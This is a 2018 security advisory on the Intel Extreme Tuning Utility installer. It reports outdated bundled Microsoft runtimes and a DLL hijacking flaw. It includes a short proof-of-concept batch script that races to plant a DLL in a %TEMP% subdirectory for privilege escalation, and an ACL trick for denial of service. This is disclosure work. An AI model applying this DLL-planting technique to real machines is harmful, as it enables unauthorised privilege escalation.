Hi @ll, the executable installer of the Intel Extreme Tuning Utility, version 6.4.1.23 (Latest), released 5/18/2018, available from via is (SURPRISE!) vulnerable. CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H Vulnerability #0: ================= The executable installer XTU-Setup.exe comes with at least two OUTDATED and UNSUPPORTED runtime components from Microsoft, one of which has known and long fixed vulnerabilities! Component #1: ~~~~~~~~~~~~~ Microsoft SQL Server Compact 3.5 SP2 ENU This is end-of-life since 4/10/2018; see Component #2: ~~~~~~~~~~~~~ Microsoft Visual C++ 2005 Runtime 8.0.50727.762 Visual C++ 2005 is end-of-life since 4/12/2016, more than TWO years ago; see The latest Visual C++ 2005 Runtime is version 8.0.50727.4940, published 4/12/2011, updated, 6/14/2011, i.e. SEVEN+ years ago. See and Also see The icing on the cake: XTU-Setup.exe tries to install the OUTDATED and VULNERABLE Microsoft Visual C++ 2005 Runtime 8.0.50727.762 even if a newer version is already installed! That's a pretty good example for AWFUL BAD software engineering! Vulnerability #1: ================= The vcredist_x86.exe package included in XTU-Setup.exe and executed by it was built with Wix toolset 3.6 See and I recommend to exercise ENHANCED INTERROGATIONS with Microsoft about their SLOPPY attitude to software security: the fixes were released about 2.5 years ago, in cooperation with Microsoft, FireGiant and me, but Microsoft failed or was to lazy to update their installer packages. Demonstrations/proof of concepts: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ These are for STANDARD installations of Windows, i.e. where the user account created during Windows setup is used. This precondition is met on typical installations of Windows: according to Microsoft's own security intelligence reports, about 1/2 to 3/4 of the about 600 million Windows installations which send telemetry data have only ONE active user account. See A) for the arbitrary code execution with elevation of privilege --------------------------------------------------------------- 1. follow the instructions from and build the non-forwarding DLLDUMMY.DLL in your %TEMP% directory; 2. create the following batch script: --- wixstdba.cmd --- :WIXSTDBA @if not exist "%temp%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll" goto :WIXSTDBA copy "%TEMP%\dlldummy.dll" "%temp%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll" --- EOF --- 3. run the batch script per double click; 4. run XTU-Setup.exe: notice the message boxes displayed from the WIXSTDBA.DLL copied into the subdirectory of %TEMP%. B) for the denial of service ---------------------------- 1. add the NTFS access control list entry (D;OIIO;WP;;;WD) meaning "deny execution of files in this directory for everyone, inheritable to all subdirectories" to the (user's) %TEMP% directory. NOTE: this does NOT need administrative privileges! 2. execute XTU-Setup.exe: notice the message box displaying the failure of the installation about 3/4 way through. STAY FAR AWAY FROM INTEL'S VULNERABLE CRAPWARE! stay tuned Stefan Kanthak Timeline ~~~~~~~~ 2017-09-04 vulnerability report sent to Intel no answer, not even an acknowledgement of receipt 2018-03-22 vulnerability report resent to Intel 2018-05-18 updated installers published by Intel, but no security advisory 2018-06-05 vulnerability report for the updated but still vulnerable installers sent to Intel 2018-09-11 security advisory published by Intel: 2018-09-26 own security advisory published